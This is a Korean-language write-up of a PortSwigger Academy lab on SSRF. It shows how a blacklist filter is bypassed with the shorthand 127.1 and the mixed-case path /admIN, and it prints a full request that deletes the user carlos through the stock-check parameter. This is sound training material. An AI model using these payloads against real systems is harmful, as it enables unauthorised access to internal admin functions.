Lab: SSRF with blacklist-based input filter 필터링 우회 Writeup

내부 시스템 데이터를 가져와 재고를 확인하는 기능이다
재고확인을 하는 URL을 어드민 인터페이스 접근하도록 바꿔서 carlos 계정을 삭제하는 시나리오

위치는 임의로 런던으로 세팅한 후 재고확인을 하는 파켓을 burpsuite에서 인터셉트해보자

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D3%26storeId%3D1

POST 메소드로 재고확인하는 파켓을 살펴보자
stockApi 파라미터를 보면 storeId도 있고 url의 형식이 있다
리피터에서 변조하자

 

아무런 필터링 우회없이 접근을 시도하니 당연히 400 Bad Request로 막힌다

blocked for security reason 을 보니 블락을 우회하는 방식으로 하면 될듯?

 

 

인코딩으로 시도해봐도 여전히 400 Bad Request

 

 

8진수로 전환해서 하니까 이번에는 400가 아닌 500 Internal Server Error로 바꼈다

다른 우회 방법을 시도해보자 

 

 

이번에는 축약 방식을 사용해서 http://127.1/ 으로 시도하니까 

드디어 200 ok 성공했다

admin 인터페이스에 접근해야 하니 /admin 으로 접근해보자

 

 

혹시 몰라서 /admin 으로 바로 접근하지 않고

/admIN 이렇게 대소문자를 섞어서 시도하니 바로 200 ok 로 어드민 페이지로 접근이 가능했다

 

 

/admIN/delete?username=carlos 를 stockApi 파라미터 값에 넣음

HTTP request 전체는 아래와 같음

POST /product/stock HTTP/2
Host: 0a4300f404676b99801d215d002800af.web-security-academy.net
Cookie: session=kkacw49gAQunCtfqF2xSR2SNHe04iMMu
Content-Length: 27
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: ko-KR,ko;q=0.9
Sec-Ch-Ua: "Not:A-Brand";v="24", "Chromium";v="134"
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a4300f404676b99801d215d002800af.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4300f404676b99801d215d002800af.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

stockApi=http://127.1/admIN/delete?username=carlos

 

302 found는 내가 요청한 리소스를 찾았다는 거니까 follow redirection으로 추가 접근을 함

 

200	OK
302	Founnd
400	Bad Request
401	Unauthorized
500	Intermal Serval Error

 

주요 HTTP 상태 코드들은 기억해두도록 하자

 

 

GET 메소드로 요청하고 /admin 인터페이스에 접근

carlos 계정 삭제까지 완료하니 문제 풀이 완료 !!